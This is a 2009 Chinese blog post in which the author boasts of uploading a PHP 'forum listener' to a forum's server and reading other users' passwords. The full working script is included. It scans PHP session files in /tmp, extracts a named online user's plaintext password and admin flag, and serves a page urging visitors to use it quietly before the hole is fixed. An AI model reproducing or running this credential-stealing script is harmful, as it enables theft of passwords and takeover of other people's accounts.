一个查看session内容的函数

  •   2009-07-31/22:59
  • 之所以是能写出来这个函数,主要是对该网站的session结构清楚,如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:
    <?
    function submit1(){
    global $username;
    print "<title>论坛监听器</title>";
    $i=0;
    if($username=="tasm"||$username=="Tasm")
    {
    print "你也太黑了吧?连我你也查?";
      return;
    }
    $path="/tmp/";
    $d = dir($path);
    while($entry=$d->read()){
    if(substr($entry,0,4)=="sess"){
    $entry=$path.$entry;
    $ary=@file($entry);
    if(!empty($ary[0])){
    $ary = explode(";",$ary[0]);
    $name= explode(":",$ary[0]);
    if($name[2]=="\"".$username."\""){
    $passwd= explode(":",$ary[1]);
    $mode=explode(":",$ary[3]);
    print "用户笔名:".$name[2]."<br>使用密码:".$passwd[2]."<br>使用模式:";
    if($mode[1]==1)
    print "<font color=red>管理员</font>";
    else
    print "一般用户";
    print"<br><br>偷窃他人密码是不道德行为请少少为之<br>";
    $i=1;
    break;
    }}}}
    if(!$i)
    print "用户:".$username."真的在线吗?如你确定,<a href='javascript:history.go(-1)'>请再来一次</a>,不要多打空格!";
    $d->close();
    }

    function login(){
    ?>
    <html>
    <head>
    <title>论坛监听器</title>
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
    </head>
    <body bgcolor="#FFFFFF">
    <div align="center">
    <p>论坛监听器 </p>
    <p> </p>
    <table width="500" border="0" cellspacing="0" cellpadding="0">
    <tr>
    <td colspan="2">当你看到一用户在线时你想看他的密码,你要如何作呢?</td>
    </tr>
    <tr>
    <td colspan="2">让我来告诉你:就是使用本程序。</td>
    </tr>
    <tr>
    <td colspan="2"><font color=red>郑重申明:本程序为自由程序,由它所造成的任何损失本人盖不负责。</font>
    <br>不过这个问题也许很快就会被堵上,个位还是不要张扬的偷着用吧。</td>
    </tr>
    </table>
    <form name="form1" method="post" action="<?print $PHP_SELF ?>" >
    <p>请输入你要查的用户名:<br>
    <input type="text" name="username">
    </p>
    <p>
    <input type="submit" name="submit1" value="我同意以上申明,开始查找">
    </p>
    </form>
    <p> </p>
    </div>
    </body>
    </html>
    <?
    }
    //--------------main()
    if($submit1)
    submit1();
    else
    login();
    ?>

    评论 {{userinfo.comments}}

    {{money}}

    {{question.question}}

    A {{question.A}}
    B {{question.B}}
    C {{question.C}}
    D {{question.D}}
    提交

    驱动号 更多